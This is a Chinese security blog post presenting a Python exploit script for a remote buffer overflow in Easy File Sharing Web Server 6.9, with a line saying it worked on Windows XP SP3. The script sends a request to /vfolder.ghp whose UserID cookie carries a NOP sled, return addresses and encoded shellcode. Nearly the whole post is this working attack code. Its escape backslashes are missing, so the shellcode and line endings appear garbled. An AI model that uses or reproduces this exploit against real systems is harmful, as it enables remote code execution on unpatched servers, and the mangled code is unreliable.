Easy File Sharing Web Server 6.9 远程溢出漏洞

释放双眼,带上耳机,听听看~!
from struct import pack
import socket,sys
import os
  
host="192.168.109.129"
port=80
  
junk0 = "x90" * 80

call_edx=pack('<L',0x1001D8C8) 
 
junk1="x90" * 396
ppr=pack('<L',0x10010101)  
crafted_jmp_esp=pack('<L',0xA4523C15)


test_bl=pack('<L',0x10010125) 
 
kungfu=pack('<L',0x10022aac)  
kungfu+=pack('<L',0xDEADBEEF) 
kungfu+=pack('<L',0xDEADBEEF) 
kungfu+=pack('<L',0x1001a187) 
kungfu+=pack('<L',0x1002466d) 
 
nopsled="x90" * 20

shellcode=("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")
 
payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
 
buf="GET /vfolder.ghp HTTP/1.1rn"
buf+="User-Agent: Mozilla/4.0rn"
buf+="Host:" + host + ":" + str(port) + "rn"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
buf+="Accept-Language: en-usrn"
buf+="Accept-Encoding: gzip, deflatern"
buf+="Referer: http://" + host + "/rn"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;rn"
buf+="Conection: Keep-Alivernrn"
  
print "[*] Connecting to Host " + host + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respondn"
    sys.exit(0)
     
print "[*] Sending malformed request..."
s.send(buf)
 
print "[!] Exploit has been sent!n"
s.close()

成功在win xp sp3上溢出

图一 溢出前

图二 溢出后

渗透教程质量好文

MySQL 注射绕过技巧 (三)

2020-6-15 21:38:26

WEB安全渗透教程漏洞

红队评估实战靶场(1)

2020-6-17 19:56:22

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索